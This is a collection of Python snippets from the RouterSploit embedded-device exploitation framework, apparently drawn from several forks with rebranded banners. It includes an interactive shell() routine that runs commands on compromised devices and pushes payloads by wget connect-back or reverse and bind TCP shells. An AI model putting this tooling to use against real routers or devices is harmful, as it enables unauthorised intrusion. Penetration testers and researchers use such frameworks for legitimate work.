def __init__(self): super(RoutersploitInterpreter, self).__init__() PrinterThread().start() self.current_module = None self.raw_prompt_template = None self.module_prompt_template = None self.prompt_hostname = "rsf" self.show_sub_commands = ("info", "options", "advanced", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists") self.search_sub_commands = ("type", "device", "language", "payload", "vendor") self.global_commands = sorted( ["use ", "exec ", "help", "exit", "show ", "search "]) self.module_commands = ["run", "back", "set ", "setg ", "check"] self.module_commands.extend(self.global_commands) self.module_commands.sort() self.modules = index_modules() self.modules_count = Counter() self.modules_count.update( [module.split('.')[0] for module in self.modules]) self.main_modules_dirs = [ module for module in os.listdir(MODULES_DIR) if not module.startswith("__") ] self.__parse_prompt() self.banner = """ ______ _ _____ _ _ _ | ___ \\ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_ | // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __| | |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_ \\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.4.1 Homepage : https://www.threat9.com - @threatnine Join Slack : https://www.threat9.com/slack Join Threat9 Beta Program - https://www.threat9.com Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """.format(exploits_count=self.modules_count["exploits"], scanners_count=self.modules_count["scanners"], creds_count=self.modules_count["creds"], generic_count=self.modules_count["generic"], payloads_count=self.modules_count["payloads"], encoders_count=self.modules_count["encoders"])
def __init__(self): super(RoutersploitInterpreter, self).__init__() PrinterThread().start() self.current_module = None self.raw_prompt_template = None self.module_prompt_template = None self.prompt_hostname = "rsf" self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists") self.global_commands = sorted( ["use ", "exec ", "help", "exit", "show ", "search "]) self.module_commands = ["run", "back", "set ", "setg ", "check"] self.module_commands.extend(self.global_commands) self.module_commands.sort() self.modules = index_modules() self.modules_count = Counter() self.modules_count.update( [module.split('.')[0] for module in self.modules]) self.main_modules_dirs = [ module for module in os.listdir(MODULES_DIR) if not module.startswith("__") ] self.__handle_if_noninteractive(sys.argv[1:]) self.__parse_prompt() self.banner = """ ______ _ _____ _ _ _ | ___ \\ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_ | // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __| | |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_ \\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : TecnoSolution Version : 4.0.0 YouTube : https://www.youtube.com/channel/UCf9siCVepHU1juk-9YFztOg - @TecnoSolution Facebook : https://www.facebook.com/TecnoSolution2019 Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """.format(exploits_count=self.modules_count["exploits"], scanners_count=self.modules_count["scanners"], creds_count=self.modules_count["creds"], generic_count=self.modules_count["generic"], payloads_count=self.modules_count["payloads"], encoders_count=self.modules_count["encoders"])
def __init__(self): super(RoutersploitInterpreter, self).__init__() PrinterThread().start() self.current_module = None self.raw_prompt_template = None self.module_prompt_template = None self.prompt_hostname = "rsf" self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists") self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "]) self.module_commands = ["run", "back", "set ", "setg ", "check"] self.module_commands.extend(self.global_commands) self.module_commands.sort() self.modules = index_modules() self.modules_count = Counter() self.modules_count.update([module.split('.')[0] for module in self.modules]) self.main_modules_dirs = [module for module in os.listdir(MODULES_DIR) if not module.startswith("__")] self.__handle_if_noninteractive(sys.argv[1:]) self.__parse_prompt() self.banner = """ ______ _ _____ _ _ _ | ___ \\ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\\ `--. _ __ | | ___ _| |_ | // _ \\| | | | __/ _ \\ '__|`--. \\ '_ \\| |/ _ \\| | __| | |\\ \\ (_) | |_| | || __/ | /\\__/ / |_) | | (_) | | |_ \\_| \\_\\___/ \\__,_|\\__\\___|_| \\____/| .__/|_|\\___/|_|\\__| | | Exploitation Framework for |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.4.0 Homepage : https://www.threat9.com - @threatnine Join Slack : https://www.threat9.com/slack Join Threat9 Beta Program - https://www.threat9.com Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """.format(exploits_count=self.modules_count["exploits"], scanners_count=self.modules_count["scanners"], creds_count=self.modules_count["creds"], generic_count=self.modules_count["generic"], payloads_count=self.modules_count["payloads"], encoders_count=self.modules_count["encoders"])
def get_encoders(self): encoders = [] # get all encoders for given architecture all_encoders = [e for e in index_modules() if "encoders.{}".format(self.architecture) in e] for e in all_encoders: encoder = e.replace("encoders.{}.".format(self.architecture), "").replace(".", "/") module = getattr(importlib.import_module('routersploit.modules.' + e), "Encoder") encoders.append(( "{}/{}".format(self.architecture, encoder), module._Encoder__info__["name"], module._Encoder__info__["description"], )) return encoders
def __init__(self): super(RoutersploitInterpreter, self).__init__() PrinterThread().start() self.current_module = None self.raw_prompt_template = None self.module_prompt_template = None self.prompt_hostname = "rsf" self.show_sub_commands = ("info", "options", "devices", "all", "encoders", "creds", "exploits", "scanners", "wordlists") self.global_commands = sorted(["use ", "exec ", "help", "exit", "show ", "search "]) self.module_commands = ["run", "back", "set ", "setg ", "check"] self.module_commands.extend(self.global_commands) self.module_commands.sort() self.modules = index_modules() self.modules_count = Counter() self.modules_count.update([module.split('.')[0] for module in self.modules]) self.main_modules_dirs = [module for module in os.listdir(MODULES_DIR) if not module.startswith("__")] self.__handle_if_noninteractive(sys.argv[1:]) self.__parse_prompt() self.banner = """ ______ _ _____ _ _ _ INDRO-SEKHAR-TRIDEEP | | Exploitation Framework |_| Exploits: {exploits_count} Scanners: {scanners_count} Creds: {creds_count} Generic: {generic_count} Payloads: {payloads_count} Encoders: {encoders_count} """.format(exploits_count=self.modules_count["exploits"], scanners_count=self.modules_count["scanners"], creds_count=self.modules_count["creds"], generic_count=self.modules_count["generic"], payloads_count=self.modules_count["payloads"], encoders_count=self.modules_count["encoders"])
def shell(exploit, architecture="", method="", payloads=None, **params): available_payloads = {} payload = None options = [] if architecture and method: # get all payloads for given architecture all_payloads = [p.lstrip('payloads.').replace('.', '/') for p in index_modules() if "payloads.{}".format(architecture) in p] for p in all_payloads: module = getattr(importlib.import_module('routersploit.modules.payloads.' + p.replace('/', '.')), 'Payload') # if method/arch is cmd then filter out payloads if method == "cmd": if getattr(module, "cmd") in payloads: available_payloads[p] = module else: available_payloads[p] = module print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.") print_info() while True: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"]) cmd = input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": if not available_payloads: print_error("There are no available payloads for this exploit") continue print_status("Available payloads:") headers = ("Payload", "Name", "Description") data = [] for p in available_payloads.keys(): data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"])) print_table(headers, *data) elif cmd.startswith("set payload "): if not available_payloads: print_error("There are no available payloads for this exploit") continue c = cmd.split(" ") if c[2] in available_payloads.keys(): payload = available_payloads[c[2]]() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]]) if payload.handler == "bind_tcp": options.append(["rhost", exploit.target, "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) options.append(["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format(c[1])) break option[1] = c[2] print_info("{} => {}".format(c[1], c[2])) elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: print_error("Exploit failed to transfer payload") continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "cmd": params["exec_binary"] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))
def shell(exploit, architecture="", method="", payloads=None, **params): available_payloads = {} payload = None options = [] if architecture and method: # get all payloads for given architecture all_payloads = [p.replace("payloads.", "").replace(".", "/") for p in index_modules() if "payloads.{}".format(architecture) in p] for p in all_payloads: module = getattr(importlib.import_module("routersploit.modules.payloads." + p.replace("/", ".")), "Payload") # if method/arch is cmd then filter out payloads if method == "cmd": if getattr(module, "cmd") in payloads: available_payloads[p] = module else: available_payloads[p] = module print_info() print_success("Welcome to cmd. Commands are sent to the target via the execute method.") print_status("For further exploitation use 'show payloads' and 'set payload <payload>' commands.") print_info() while True: while not printer_queue.empty(): pass if payload is None: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 > " else: cmd_str = "\001\033[4m\002cmd\001\033[0m\002 (\033[94m{}\033[0m) > ".format(payload._Payload__info__["name"]) cmd = input(cmd_str) if cmd in ["quit", "exit"]: return elif cmd == "show payloads": if not available_payloads: print_error("There are no available payloads for this exploit") continue print_status("Available payloads:") headers = ("Payload", "Name", "Description") data = [] for p in available_payloads.keys(): data.append((p, available_payloads[p]._Payload__info__["name"], available_payloads[p]._Payload__info__["description"])) print_table(headers, *data) elif cmd.startswith("set payload "): if not available_payloads: print_error("There are no available payloads for this exploit") continue c = cmd.split(" ") if c[2] in available_payloads.keys(): payload = available_payloads[c[2]]() options = [] for option in payload.exploit_attributes.keys(): if option not in ["output", "filepath"]: options.append([option, getattr(payload, option), payload.exploit_attributes[option][1]]) if payload.handler == "bind_tcp": options.append(["rhost", exploit.target, "Target IP address"]) if method == "wget": options.append(["lhost", "", "Connect-back IP address for wget"]) options.append(["lport", 4545, "Connect-back Port for wget"]) else: print_error("Payload not available") elif payload is not None: if cmd == "show options": headers = ("Name", "Current settings", "Description") print_info('\nPayload Options:') print_table(headers, *options) print_info() elif cmd.startswith("set "): c = cmd.split(" ") if len(c) != 3: print_error("set <option> <value>") else: for option in options: if option[0] == c[1]: try: setattr(payload, c[1], c[2]) except Exception: print_error("Invalid value for {}".format(c[1])) break option[1] = c[2] print_info("{} => {}".format(c[1], c[2])) elif cmd == "run": data = payload.generate() if method == "wget": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) if communication.wget() is False: print_error("Exploit failed to transfer payload") continue elif method == "echo": elf_binary = payload.generate_elf(data) communication = Communication(exploit, elf_binary, options, **params) communication.echo() elif method == "cmd": params["exec_binary"] = data communication = Communication(exploit, "", options, **params) if payload.handler == "bind_tcp": communication.bind_tcp() elif payload.handler == "reverse_tcp": communication.reverse_tcp() elif cmd == "back": payload = None else: print_status("Executing '{}' on the device...".format(cmd)) print_info(exploit.execute(cmd))